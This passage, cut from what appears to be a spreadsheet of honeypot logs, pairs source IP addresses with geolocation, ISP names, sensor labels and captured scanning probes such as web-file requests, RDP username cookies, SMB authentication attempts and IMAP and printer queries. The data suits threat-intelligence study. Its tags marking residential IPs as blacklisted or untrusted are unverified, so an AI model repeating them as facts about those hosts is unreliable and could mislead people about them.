(basic)}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qbxkb1mm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.118.77', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,58640)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,59472)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,59986)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,47476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,48134)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,48472)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DNLM0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OKCK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MOBP0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DNFI0'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LIDK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LLBC0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PCCI0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOHD0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}</t>
  </si>
  <si>
    <t>::ffff:b98e:ec22</t>
  </si>
  <si>
    <t>468ef45a0e875f005118d176b7a4af3b</t>
  </si>
  <si>
    <t>117.194.204.222</t>
  </si>
  <si>
    <t>::ffff:75c2:ccde</t>
  </si>
  <si>
    <t>296c92e737e6e6b624a441844acee2f4</t>
  </si>
  <si>
    <t>117.221.208.69</t>
  </si>
  <si>
    <t>::ffff:75dd:d045</t>
  </si>
  <si>
    <t>7b1d7cdf60590c97a20d72d30a5eb038</t>
  </si>
  <si>
    <t>117.206.128.163</t>
  </si>
  <si>
    <t>::ffff:75ce:80a3</t>
  </si>
  <si>
    <t>9b2fa69174f249aedb37a49aca002f8b</t>
  </si>
  <si>
    <t>103.147.8.180</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.147.8.180,24227)}</t>
  </si>
  <si>
    <t>::ffff:6793:8b4</t>
  </si>
  <si>
    <t>2adf3ef026aafb4c54a2ed795dea9af3</t>
  </si>
  <si>
    <t>59.184.67.18</t>
  </si>
  <si>
    <t>::ffff:3bb8:4312</t>
  </si>
  <si>
    <t>744e8cb847b97f7801f105c849548660</t>
  </si>
  <si>
    <t>117.244.44.135</t>
  </si>
  <si>
    <t>::ffff:75f4:2c87</t>
  </si>
  <si>
    <t>fbaafc03ce9eecb80e3d5b30fdada591</t>
  </si>
  <si>
    <t>5.235.204.101</t>
  </si>
  <si>
    <t>Gilan Province</t>
  </si>
  <si>
    <t>Rasht</t>
  </si>
  <si>
    <t>37.2761</t>
  </si>
  <si>
    <t>49.5886</t>
  </si>
  <si>
    <t>Telecommunication Company of Gilan</t>
  </si>
  <si>
    <t>::ffff:5eb:cc65</t>
  </si>
  <si>
    <t>0dd28ac76790dedad7c584eb73172ddb</t>
  </si>
  <si>
    <t>117.198.11.86</t>
  </si>
  <si>
    <t>::ffff:75c6:b56</t>
  </si>
  <si>
    <t>ea363b83d5e4d5e7c672a4f5373d9c34</t>
  </si>
  <si>
    <t>117.200.102.61</t>
  </si>
  <si>
    <t>::ffff:75c8:663d</t>
  </si>
  <si>
    <t>3fb99d1b00cd638e9e6225d172871efd</t>
  </si>
  <si>
    <t>117.202.72.4</t>
  </si>
  <si>
    <t>::ffff:75ca:4804</t>
  </si>
  <si>
    <t>9bde744c734181a30d29e9eb5c6452af</t>
  </si>
  <si>
    <t>174.87.154.90</t>
  </si>
  <si>
    <t>syn-174-087-154-090.res.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;39049&amp;&amp;36906</t>
  </si>
  <si>
    <t>Tulare</t>
  </si>
  <si>
    <t>Porterville</t>
  </si>
  <si>
    <t>5384471</t>
  </si>
  <si>
    <t>93257</t>
  </si>
  <si>
    <t>36.0652</t>
  </si>
  <si>
    <t>-119.017</t>
  </si>
  <si>
    <t>::ffff:ae57:9a5a</t>
  </si>
  <si>
    <t>4f863278bf8a721a1abb41bcfb809440</t>
  </si>
  <si>
    <t>116.111.98.170</t>
  </si>
  <si>
    <t>::ffff:746f:62aa</t>
  </si>
  <si>
    <t>4711f7b92abd6823f1f74c54260badca</t>
  </si>
  <si>
    <t>125.24.6.126</t>
  </si>
  <si>
    <t>node-1a6.pool-125-24.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>::ffff:7d18:67e</t>
  </si>
  <si>
    <t>9a4162424b1fe5162b48f3d5a59f0d80</t>
  </si>
  <si>
    <t>182.56.193.78</t>
  </si>
  <si>
    <t>::ffff:b638:c14e</t>
  </si>
  <si>
    <t>4ee62755307915171264a1dacf8d6625</t>
  </si>
  <si>
    <t>112.167.66.79</t>
  </si>
  <si>
    <t>::ffff:70a7:424f</t>
  </si>
  <si>
    <t>6d10dacec4afded034f6db2709e161d6</t>
  </si>
  <si>
    <t>120.60.126.219</t>
  </si>
  <si>
    <t>::ffff:783c:7edb</t>
  </si>
  <si>
    <t>2e974188681b62ca997909249c234b9b</t>
  </si>
  <si>
    <t>156.255.221.207</t>
  </si>
  <si>
    <t>10.641</t>
  </si>
  <si>
    <t>-71.6074</t>
  </si>
  <si>
    <t>AS61461</t>
  </si>
  <si>
    <t>Corporacion Matrix TV CA</t>
  </si>
  <si>
    <t>::ffff:9cff:ddcf</t>
  </si>
  <si>
    <t>cd4bba5aa0ca4da373bbbc8ee905e69d</t>
  </si>
  <si>
    <t>194.69.200.166</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;53&amp;&amp;8470</t>
  </si>
  <si>
    <t>Stara Zagora</t>
  </si>
  <si>
    <t>Kazanlak</t>
  </si>
  <si>
    <t>Kazanlak (Progres)</t>
  </si>
  <si>
    <t>730496</t>
  </si>
  <si>
    <t>6100</t>
  </si>
  <si>
    <t>42.6189</t>
  </si>
  <si>
    <t>25.3898</t>
  </si>
  <si>
    <t>39024</t>
  </si>
  <si>
    <t>Nastech OOD</t>
  </si>
  <si>
    <t>::ffff:c245:c8a6</t>
  </si>
  <si>
    <t>5382ccfbb472f4c859b536a5a98b426d</t>
  </si>
  <si>
    <t>117.215.19.100</t>
  </si>
  <si>
    <t>::ffff:75d7:1364</t>
  </si>
  <si>
    <t>2d50f77513fb542316f6fb72b6898701</t>
  </si>
  <si>
    <t>103.167.204.66</t>
  </si>
  <si>
    <t>2021-06-01</t>
  </si>
  <si>
    <t>::ffff:67a7:cc42</t>
  </si>
  <si>
    <t>068454457b7470e2accfbf45f3cf1c08</t>
  </si>
  <si>
    <t>37.248.192.56</t>
  </si>
  <si>
    <t>ip-37-248-192-56.multi.internet.cyfrowypolsat.pl</t>
  </si>
  <si>
    <t>Warsaw (Targówek)</t>
  </si>
  <si>
    <t>52.2625</t>
  </si>
  <si>
    <t>21.0984</t>
  </si>
  <si>
    <t>8374</t>
  </si>
  <si>
    <t>PLUSNET</t>
  </si>
  <si>
    <t>Polkomtel Sp. z o.o.</t>
  </si>
  <si>
    <t>Cyfrowy Polsat S.A</t>
  </si>
  <si>
    <t>::ffff:25f8:c038</t>
  </si>
  <si>
    <t>b8729fe27e9634d5cfa69bb895227619</t>
  </si>
  <si>
    <t>117.214.254.242</t>
  </si>
  <si>
    <t>::ffff:75d6:fef2</t>
  </si>
  <si>
    <t>69c9befad47f6d7f82c509e59766d200</t>
  </si>
  <si>
    <t>117.204.21.17</t>
  </si>
  <si>
    <t>::ffff:75cc:1511</t>
  </si>
  <si>
    <t>70294819cb777adf9e7c99ad0760c3b8</t>
  </si>
  <si>
    <t>117.192.139.57</t>
  </si>
  <si>
    <t>::ffff:75c0:8b39</t>
  </si>
  <si>
    <t>5d169a81fd53de0cf21343e9c89a82be</t>
  </si>
  <si>
    <t>5.135.58.202</t>
  </si>
  <si>
    <t>ronan.probe.onyphe.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_HTTPS_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;53&amp;&amp;4899&amp;&amp;34295&amp;&amp;3306&amp;&amp;5900&amp;&amp;11204&amp;&amp;65347&amp;&amp;25&amp;&amp;110&amp;&amp;5432&amp;&amp;1521&amp;&amp;1080&amp;&amp;NA&amp;&amp;55894&amp;&amp;21&amp;&amp;80&amp;&amp;15161</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:587:3aca</t>
  </si>
  <si>
    <t>2ec3a39895b6bf4326a913939d180644</t>
  </si>
  <si>
    <t>120.57.160.90</t>
  </si>
  <si>
    <t>::ffff:7839:a05a</t>
  </si>
  <si>
    <t>b9a3ea2ff558e65758b479dfd3a07286</t>
  </si>
  <si>
    <t>117.211.132.134</t>
  </si>
  <si>
    <t>NME-Project</t>
  </si>
  <si>
    <t>::ffff:75d3:8486</t>
  </si>
  <si>
    <t>0ade39d972f042dfef85370e8dbf43a8</t>
  </si>
  <si>
    <t>13.217.91.131</t>
  </si>
  <si>
    <t>::ffff:dd9:5b83</t>
  </si>
  <si>
    <t>73b16ef61d30a8287c4968868346f4a1</t>
  </si>
  <si>
    <t>182.59.245.187</t>
  </si>
  <si>
    <t>::ffff:b63b:f5bb</t>
  </si>
  <si>
    <t>80dbe2d55df9e0104a3fe0aae8e1422c</t>
  </si>
  <si>
    <t>77.104.235.188</t>
  </si>
  <si>
    <t>HoneyPot Blacklisted IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H42</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;110</t>
  </si>
  <si>
    <t>Pardubický</t>
  </si>
  <si>
    <t>Chrudim District</t>
  </si>
  <si>
    <t>Chrudim (Chrudim IV)</t>
  </si>
  <si>
    <t>3077539</t>
  </si>
  <si>
    <t>537 01</t>
  </si>
  <si>
    <t>49.9563</t>
  </si>
  <si>
    <t>15.7943</t>
  </si>
  <si>
    <t>39906</t>
  </si>
  <si>
    <t>CoProSys a.s.</t>
  </si>
  <si>
    <t>2006-11-28</t>
  </si>
  <si>
    <t>::ffff:4d68:ebbc</t>
  </si>
  <si>
    <t>fb5a8fa574b12b9f192fb7546869a34e</t>
  </si>
  <si>
    <t>103.80.15.168</t>
  </si>
  <si>
    <t>Visakhapatanam</t>
  </si>
  <si>
    <t>Visakhapatnam (Auto Nagar)</t>
  </si>
  <si>
    <t>1253102</t>
  </si>
  <si>
    <t>530001</t>
  </si>
  <si>
    <t>17.6899</t>
  </si>
  <si>
    <t>83.1936</t>
  </si>
  <si>
    <t>136716</t>
  </si>
  <si>
    <t>APPLE BROADBAND SERVICES PVT. LTD</t>
  </si>
  <si>
    <t>Violet Broadband Pvt Ltd</t>
  </si>
  <si>
    <t>2016-11-22</t>
  </si>
  <si>
    <t>VIOLET</t>
  </si>
  <si>
    <t>::ffff:6750:fa8</t>
  </si>
  <si>
    <t>40ed621449a9aee91fbf3c16a6e4aeb6</t>
  </si>
  <si>
    <t>117.214.79.9</t>
  </si>
  <si>
    <t>::ffff:75d6:4f09</t>
  </si>
  <si>
    <t>b43c1f2733156ca365be48ec2937ebcf</t>
  </si>
  <si>
    <t>116.73.211.97</t>
  </si>
  <si>
    <t>::ffff:7449:d361</t>
  </si>
  <si>
    <t>eab4fe920889b1a4233a0d32db3e4541</t>
  </si>
  <si>
    <t>117.202.177.179</t>
  </si>
  <si>
    <t>::ffff:75ca:b1b3</t>
  </si>
  <si>
    <t>9d77657987ac4448ba61191a14e7176f</t>
  </si>
  <si>
    <t>176.239.44.247</t>
  </si>
  <si>
    <t>Blackberry</t>
  </si>
  <si>
    <t>2011-12-01</t>
  </si>
  <si>
    <t>::ffff:b0ef:2cf7</t>
  </si>
  <si>
    <t>741a6751183d466412f9cbf8a8770bd6</t>
  </si>
  <si>
    <t>117.248.167.122</t>
  </si>
  <si>
    <t>::ffff:75f8:a77a</t>
  </si>
  <si>
    <t>6df7123b80f5ca6d93fd1a147e535cec</t>
  </si>
  <si>
    <t>117.207.163.141</t>
  </si>
  <si>
    <t>::ffff:75cf:a38d</t>
  </si>
  <si>
    <t>7787cb7b938fe2b4e58b3777e1aeda71</t>
  </si>
  <si>
    <t>59.182.147.132</t>
  </si>
  <si>
    <t>::ffff:3bb6:9384</t>
  </si>
  <si>
    <t>886ad480359a2ebd0b130f90b659b8f4</t>
  </si>
  <si>
    <t>146.70.129.118</t>
  </si>
  <si>
    <t>1991-01-23</t>
  </si>
  <si>
    <t>::ffff:9246:8176</t>
  </si>
  <si>
    <t>495df4ca0a5fab9404ca15fb55275c99</t>
  </si>
  <si>
    <t>117.254.22.200</t>
  </si>
  <si>
    <t>::ffff:75fe:16c8</t>
  </si>
  <si>
    <t>ba409a148e244197d87b82b32a325d4d</t>
  </si>
  <si>
    <t>117.233.140.50</t>
  </si>
  <si>
    <t>::ffff:75e9:8c32</t>
  </si>
  <si>
    <t>9ecdb0b03a90dbe3195abd6a397f29f8</t>
  </si>
  <si>
    <t>103.168.240.30</t>
  </si>
  <si>
    <t>Tiruppur</t>
  </si>
  <si>
    <t>Tirupur</t>
  </si>
  <si>
    <t>1254348</t>
  </si>
  <si>
    <t>11.1154</t>
  </si>
  <si>
    <t>77.3546</t>
  </si>
  <si>
    <t>142439</t>
  </si>
  <si>
    <t>ALPHA FIBER NET</t>
  </si>
  <si>
    <t>Alpha Fiber NET</t>
  </si>
  <si>
    <t>Alphafnet</t>
  </si>
  <si>
    <t>::ffff:67a8:f01e</t>
  </si>
  <si>
    <t>0188e5d239b2a5c3e0a4901c13973bc0</t>
  </si>
  <si>
    <t>117.219.61.31</t>
  </si>
  <si>
    <t>Alangad</t>
  </si>
  <si>
    <t>11184118</t>
  </si>
  <si>
    <t>10.1019</t>
  </si>
  <si>
    <t>76.291</t>
  </si>
  <si>
    <t>::ffff:75db:3d1f</t>
  </si>
  <si>
    <t>52889c799d99d4f2b1cc471e0c004ff2</t>
  </si>
  <si>
    <t>59.23.21.94</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;8810&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b17:155e</t>
  </si>
  <si>
    <t>554b5829f1fe41cf7feeddf107d7ad9d</t>
  </si>
  <si>
    <t>49.205.218.245</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>20115&amp;&amp;1433&amp;&amp;445&amp;&amp;51753&amp;&amp;51624</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,51587)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,54224)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,57212)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,62090)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,53273)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,53857)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,59190)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,59813)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:31cd:daf5</t>
  </si>
  <si>
    <t>d4765331efc982c9f4d23bd39e6f8f7d</t>
  </si>
  <si>
    <t>118.70.80.139</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>54</t>
  </si>
  <si>
    <t>Bắc Giang Province</t>
  </si>
  <si>
    <t>Huyện Lạng Giang</t>
  </si>
  <si>
    <t>Kép</t>
  </si>
  <si>
    <t>1579752</t>
  </si>
  <si>
    <t>21.4</t>
  </si>
  <si>
    <t>106.267</t>
  </si>
  <si>
    <t>::ffff:7646:508b</t>
  </si>
  <si>
    <t>bbb1751e0da1e2d350a06e18b64c6ef6</t>
  </si>
  <si>
    <t>164.77.147.186</t>
  </si>
  <si>
    <t>58914&amp;&amp;23</t>
  </si>
  <si>
    <t>Las Condes</t>
  </si>
  <si>
    <t>3884447</t>
  </si>
  <si>
    <t>7550000</t>
  </si>
  <si>
    <t>-33.4155</t>
  </si>
  <si>
    <t>-70.6056</t>
  </si>
  <si>
    <t>27651</t>
  </si>
  <si>
    <t>ENTEL CHILE S.A.</t>
  </si>
  <si>
    <t>Entel Chile S.A.</t>
  </si>
  <si>
    <t>Entel Chile S.A</t>
  </si>
  <si>
    <t>::ffff:a44d:93ba</t>
  </si>
  <si>
    <t>ff24b730de3dfc8dfddf9353d43df121</t>
  </si>
  <si>
    <t>117.194.17.180</t>
  </si>
  <si>
    <t>::ffff:75c2:11b4</t>
  </si>
  <si>
    <t>05ba5cd6b8565ba649604e9b9050a407</t>
  </si>
  <si>
    <t>125.25.100.181</t>
  </si>
  <si>
    <t>Bang Kruai</t>
  </si>
  <si>
    <t>1619434</t>
  </si>
  <si>
    <t>13.805</t>
  </si>
  <si>
    <t>100.473</t>
  </si>
  <si>
    <t>::ffff:7d19:64b5</t>
  </si>
  <si>
    <t>f33c2b8259d6f55a73ac7fe6f5ab4527</t>
  </si>
  <si>
    <t>103.116.178.122</t>
  </si>
  <si>
    <t>Surat (Vesu)</t>
  </si>
  <si>
    <t>395007</t>
  </si>
  <si>
    <t>21.1494</t>
  </si>
  <si>
    <t>72.7728</t>
  </si>
  <si>
    <t>Bharatbhai Dinubhai Amin</t>
  </si>
  <si>
    <t>City Broadband</t>
  </si>
  <si>
    <t>2018-06-05</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.116.178.122,58234)}&amp;&amp;{Data_SMB:Incoming connection (103.116.178.122,58606)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6774:b27a</t>
  </si>
  <si>
    <t>9cc96b727b37b757c3e0d16fa3d30b74</t>
  </si>
  <si>
    <t>113.193.208.186</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>1433&amp;&amp;389&amp;&amp;62904&amp;&amp;1521&amp;&amp;24338&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
